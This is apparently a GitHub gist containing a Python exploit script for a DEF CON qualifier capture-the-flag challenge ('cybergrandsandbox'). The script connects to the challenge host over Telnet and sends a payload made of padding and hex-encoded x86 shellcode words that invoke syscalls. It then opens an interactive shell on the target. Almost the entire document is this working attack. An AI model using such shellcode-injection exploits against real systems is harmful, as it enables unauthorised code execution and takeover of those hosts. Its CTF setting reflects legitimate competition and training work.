#!/usr/bin/python | |
from Pwning import * | |
# customs when binary doesn't have nx eable or mprotect/nmap is on got table | |
# from Shellcode import * | |
# edit Templet with your own Name | |
class CGC(Payload): | |
def __init__(self): | |
Payload.__init__(self) | |
self.host[1] = 'cybergrandsandbox_e722a7ec2ad46b9fb8472db37cb95713.quals.shallweplayaga.me' # my Target host | |
self.port = 4347 # my Target port | |
self.mode = 0 # x86 target platform | |
# self.mode = 1 x86_64 target platform | |
self.conn = Telnet(self.host[1],self.port) | |
# ok i go to pwn it :D | |
def pwnTarget(self): | |
self.conn.read_until('> ') | |
pl = '0x41 '*285 | |
pl+= "0x90909080 0xcd5b016a 0x58026a80 0xcd5a506a 0x5b036a59 0x5358036a 0x41 0x41" | |
pl+= ') '*25 | |
self.conn.write(pl + '\n') | |
self.conn.interact() # pwn the shell | |
cgc = CGC() | |
cgc.pwnTarget() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment